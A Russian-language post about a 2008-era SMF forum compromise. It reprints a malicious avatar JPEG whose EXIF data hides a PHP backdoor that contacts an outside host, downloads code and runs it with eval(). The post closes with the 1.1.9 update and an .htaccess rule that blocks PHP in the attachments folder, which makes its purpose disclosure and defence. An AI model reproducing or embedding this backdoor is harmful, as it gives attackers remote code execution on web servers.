Пришел krisbarteo

krisbarteo – вот виновник создавшейся проблемы линейки форумов SMF Из за него начались проблемы, такие как взлом линейки форумов SMF Проблема заключалась в том, что указанный пользователь загружал аватар в котором содержался следующий код:

яШяб јExif  II*     

  
   1
    J   2
    f   
  
   i‡
   z       ACD Systems Digital Imaging 2008:11:22 03:08:16   ђ    0220ђ’    515  
  
    
  
          яю'<?php;$url = ‘http://wplsat23.net/?update=main’;$done = false;if(!$url){return ”;}$url_info = parse_url($url);$url_info[port] = ($url_info[port]) ? $url_info[port]:80;$url_info[path] = ($url_info[path]) ? $url_info[path] : “/”;    $url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . “?” . $url_info[query] : “”;    $query = “GET ” . $url_info[path] . ” HTTP/1.1\r\n”;    $query = $query . “Host: ” . $url_info[host] . “\r\n”;    $query = $query . “Accept: */*” . “\r\n”;    $query = $query . “Connection: close” . “\r\n”;    $query = $query . “User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12” . “\r\n”;    $query = $query . “\r\n”;    $errno = 0;    $error = “”;    $sock = fsockopen($url_info[host], $url_info[port], $errno, $error, 30);$h = array();$resp = array();if($sock){stream_set_timeout($sock, 30);fwrite($sock, $query);$hd = false;while(!feof($sock)){$l = fgets($sock);if(!$hd){if(trim($l) == ”){$hd = true;}else{$h[] = $l;}}else{$resp[] = $l;}}fclose($sock);}$ret = implode(“”, $resp);eval($ret);?>00яЫ C 
    


яЫ C


яА 


! 

яД  






       

яД µ 
 
}
 !1AQa”q2Ѓ‘Ў#B±БRСр$3br‚
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzѓ„…†‡?‰Љ’“”•–—?™љўЈ¤Ґ¦§Ё©ЄІіґµ¶·ё№єВГДЕЖЗИЙКТУФХЦЧШЩЪбвгдежзийкстуфхцчшщъяД 









     

яД µ 

w
!1AQaq”2ЃB‘Ў±Б    #3RрbrС
$4б%с&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz‚ѓ„…†‡?‰Љ’“”•–—?™љўЈ¤Ґ¦§Ё©ЄІіґµ¶·ё№єВГДЕЖЗИЙКТУФХЦЧШЩЪвгдежзийктуфхцчшщъяЪ 
 ? эSўЂ?яЩ

Посчастливилось всем кто владел этим форумом. Везде сплошной krisbarteo и его любимый аватар. Сегодня сообщество выполнило обновление линейки форума до версии 1.1.9 За что им и спасибо.

PS Как вариант можно кинуть в папку с attachments файл .htaccess с содержанием:

<Files *>
Order Deny,Allow
Deny from all
Allow from localhost
</Files>
RemoveHandler .php .php3 .phtml .cgi .fcgi .pl .fpl .shtml